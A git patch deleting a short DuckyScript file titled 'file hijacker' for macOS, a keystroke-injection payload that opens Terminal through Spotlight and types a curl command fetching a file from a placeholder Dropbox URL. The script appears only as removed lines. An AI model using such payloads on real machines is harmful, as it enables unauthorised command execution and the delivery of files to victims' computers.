From dbdf14ce5d0e0b7227bc9f097bff74d9f271c005 Mon Sep 17 00:00:00 2001 From: Narsty Date: Mon, 15 May 2023 23:08:59 -0500 Subject: [PATCH] Delete File hijacker.txt --- Executions/File hijacker.txt | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 Executions/File hijacker.txt diff --git a/Executions/File hijacker.txt b/Executions/File hijacker.txt deleted file mode 100644 index 8e3aee3..0000000 --- a/Executions/File hijacker.txt +++ /dev/null @@ -1,22 +0,0 @@ - -REM Author: Narsty -REM Title: file hijacker -REM Version 1.0 MacOs - -REM Replace with the actual URL for the file you want to download. -REM Additionally, replace file.ext with the desired name and extension for the downloaded file. - - -DELAY 2000 -GUI SPACE -DELAY 500 -STRING terminal -DELAY 500 -ENTER -DELAY 2000 -STRING curl -o "file.ext" "Enter dropbox File URL here" -ENTER - - -REM It's crucial to use scripting and automation tools responsibly, following legal and ethical guidelines, and only for legitimate purposes. -